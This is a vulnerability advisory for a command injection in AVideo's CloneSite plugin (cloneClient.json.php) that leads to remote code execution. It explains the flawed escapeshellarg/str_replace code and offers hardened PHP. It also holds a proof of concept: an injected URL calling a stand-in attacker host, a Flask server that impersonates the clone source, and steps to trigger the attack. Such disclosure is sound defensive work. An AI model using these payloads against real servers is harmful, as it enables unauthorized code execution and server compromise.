Description
plugin/CloneSite/cloneClient.json.php in the CloneSite plugin builds a shell command from a user-controlled value, the configured clone source URL (cloneSiteURL), without proper sanitization. The value is concatenated directly into a wget command that is run through exec(), which allows command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context with shell metacharacters (for example ;). This gives Remote Code Execution (RCE) on the server.
Inside plugin/CloneSite/cloneClient.json.php (line 112) the value is not properly sanitized:
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL)); // line 112
The str_replace() removes the single quotes that escapeshellarg() has just added, so the quoting is undone and the raw value, metacharacters included, reaches the shell. An attacker who controls cloneSiteURL can therefore inject commands into the wget call that follows:
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; // line 116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; // line 117
exec($cmd . " 2>&1", $output, $return_val); // line 119
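The following PHP is an added illustration, not AVideo's code: it rebuilds the same wget command the vulnerable way, to show what the str_replace() leaves in the string, and then a hardened way that keeps the escapeshellarg() quoting and also checks the dump file name that arrives in the remote JSON. The function names and the attacker URL are assumptions made for the example.

```php
<?php
// Added example (not AVideo's code): why str_replace() after escapeshellarg()
// reopens the injection, and a hardened way to build the same wget call.
// Function names and the attacker URL are assumptions for illustration.

function buildCmdVulnerable(string $cloneSiteURL, string $sqlFile, string $localPath): string
{
    // Mirrors the vulnerable lines: escapeshellarg() wraps the value in single
    // quotes, then str_replace() strips those quotes again, so ; | ` $( ) survive.
    $cloneSiteURL = str_replace("'", '', escapeshellarg($cloneSiteURL));
    $sqlURL = "{$cloneSiteURL}videos/clones/{$sqlFile}";
    return "wget -O {$localPath} {$sqlURL}";
}

function buildCmdHardened(string $cloneSiteURL, string $sqlFile, string $localPath): ?string
{
    // 1. Accept only an absolute http(s) URL that has a host.
    $parts = parse_url($cloneSiteURL);
    if ($parts === false
        || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // 2. sqlFile also comes from the remote JSON: allow a bare *.sql file name only.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.sql$/', $sqlFile) || strpos($sqlFile, '..') !== false) {
        return null;
    }
    $sqlURL = rtrim($cloneSiteURL, '/') . "/videos/clones/{$sqlFile}";
    // 3. Quote every argument and never remove the quotes escapeshellarg() adds.
    return 'wget -O ' . escapeshellarg($localPath) . ' ' . escapeshellarg($sqlURL);
}

// Safer still: skip the shell entirely. proc_open() with an array command
// (PHP >= 7.4) hands the arguments to wget directly, so no quoting is involved.
function runWgetNoShell(string $sqlURL, string $localPath): int
{
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['wget', '-O', $localPath, $sqlURL], $descriptors, $pipes);
    if (!is_resource($proc)) {
        return -1;
    }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

$evil = "http://attacker.example:8071/;id;#";  // assumed attacker-controlled cloneSiteURL

// Vulnerable build: the ';' terminates the wget command and 'id' runs after it.
echo buildCmdVulnerable($evil, 'dump.sql', '/tmp/dump.sql'), PHP_EOL;

// Hardened build: same input, but the whole URL stays inside single quotes, so
// the shell passes it to wget as one argument and nothing else is executed.
echo buildCmdHardened($evil, 'dump.sql', '/tmp/dump.sql'), PHP_EOL;

// A traversal-style dump name from the remote JSON is rejected outright.
var_dump(buildCmdHardened('https://source.example/', '../../etc/passwd', '/tmp/dump.sql'));
```

The URL check in buildCmdHardened() does not reject the metacharacters on its own (a ; is a legal URL character); what stops the injection is keeping the quotes escapeshellarg() produces, or avoiding the shell altogether with the array form of proc_open(). The file-name check matters because sqlFile is read from the attacker's JSON as well.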
The attack flow
1. Set up a malicious site that serves the clone data the client expects.
2. Store the malicious site as the CloneSite URL through objects/pluginAddDataObject.json.php (requires an admin session).
3. Request plugin/CloneSite/cloneClient.json.php to trigger the RCE.
Build the malicious site in Python, for example with Flask:
from flask import Flask, jsonify

app = Flask(__name__)

# Catch every path: whatever cloneClient.json.php appends to the injected URL
# still receives this JSON.
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    print("PATH:", path)
    # Reply in the shape cloneClient.json.php expects from the clone server.
    return jsonify({
        "error": False,
        "msg": "",
        "url": "http://target-site.com/",
        "key": "target_clone_key",
        "useRsync": 0,
        "videosDir": "/var/www/html/AVideo/videos/",
        "sqlFile": "Clone_mysqlDump_evil123.sql",
        "videoFiles": [],
        "photoFiles": []
    })

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8071)
Set the CloneSite URL to a payload like the following (requires an admin session):
curl -b 'PHPSESSID=<admin_session>'
-X POST...
Exploitability: AV:N AC:L AT:N PR:N UI:P
Vulnerable System: VC:H VI:H VA:H
Subsequent System: SC:N SI:N SA:N
Score: 8.7 / CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Note that the vector's PR:N does not match the attack flow above, which needs an admin session to set the malicious URL; with that prerequisite the Privileges Required metric would be High rather than None.